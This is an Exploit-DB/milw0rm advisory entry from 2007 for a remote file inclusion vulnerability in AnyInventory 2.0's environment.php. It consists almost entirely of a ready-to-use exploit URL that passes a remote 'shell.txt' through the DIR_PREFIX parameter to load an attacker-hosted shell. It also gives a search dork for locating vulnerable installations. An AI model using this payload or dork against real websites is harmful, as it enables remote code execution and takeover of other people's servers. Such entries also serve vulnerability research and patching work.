AnyInventory 2.0 - 'Environment.php' Remote File Inclusion

EDB-ID:

4365




Platform:

PHP

Date:

2007-09-05


#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# milw0rm.com [2007-09-05]